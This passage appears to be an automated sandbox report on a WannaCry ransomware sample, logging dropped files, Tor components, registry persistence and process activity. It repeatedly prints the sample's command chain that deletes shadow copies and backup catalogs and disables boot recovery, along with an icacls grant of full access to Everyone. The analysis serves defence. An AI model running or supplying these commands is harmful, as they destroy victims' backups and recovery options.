              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /31
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /45
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /57
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /70
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /81
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /92
              Source: libssp-0.dll.69.drStatic PE information: section name: /4
              Source: libssp-0.dll.69.drStatic PE information: section name: /19
              Source: libssp-0.dll.69.drStatic PE information: section name: /31
              Source: libssp-0.dll.69.drStatic PE information: section name: /45
              Source: libssp-0.dll.69.drStatic PE information: section name: /57
              Source: libssp-0.dll.69.drStatic PE information: section name: /70
              Source: libssp-0.dll.69.drStatic PE information: section name: /81
              Source: libssp-0.dll.69.drStatic PE information: section name: /92
              Source: ssleay32.dll.69.drStatic PE information: section name: /4
              Source: ssleay32.dll.69.drStatic PE information: section name: /19
              Source: ssleay32.dll.69.drStatic PE information: section name: /31
              Source: ssleay32.dll.69.drStatic PE information: section name: /45
              Source: ssleay32.dll.69.drStatic PE information: section name: /57
              Source: ssleay32.dll.69.drStatic PE information: section name: /70
              Source: ssleay32.dll.69.drStatic PE information: section name: /81
              Source: ssleay32.dll.69.drStatic PE information: section name: /92

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\m.vbs
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: reg.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\zlib1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\ssleay32.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libssp-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnryJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libeay32.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnryJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\~SD383F.tmpJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run whprujwpxi808
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run whprujwpxi808

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\~SDD7F7.tmpJump to behavior
              Source: @WanaDecryptor@.exe, 00000045.00000003.1539553722.00000000029B5000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drBinary or memory string: onion-port
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
